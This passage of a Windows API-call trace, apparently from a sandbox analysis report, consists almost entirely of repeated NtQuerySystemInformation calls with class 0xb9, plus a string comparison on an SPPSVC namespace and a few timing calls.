(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0229.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0229.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x28, ResultLength=0x0) [0229.778] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0229.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0229.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0229.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x28, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x28, ResultLength=0x0) [0229.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x28, ResultLength=0x0) [0229.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0229.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd5a0 | out: lpSystemTimeAsFileTime=0xc7520fd5a0*(dwLowDateTime=0xea3e57d0, dwHighDateTime=0x1d5fb6e)) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd590, Length=0x28, ResultLength=0x0) [0229.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a8, Length=0x50, ResultLength=0x0) [0229.792] GetTickCount () returned 0x117a00b [0229.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0229.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x28, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x28, ResultLength=0x0) [0229.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x28, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x20, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x20, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0229.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation 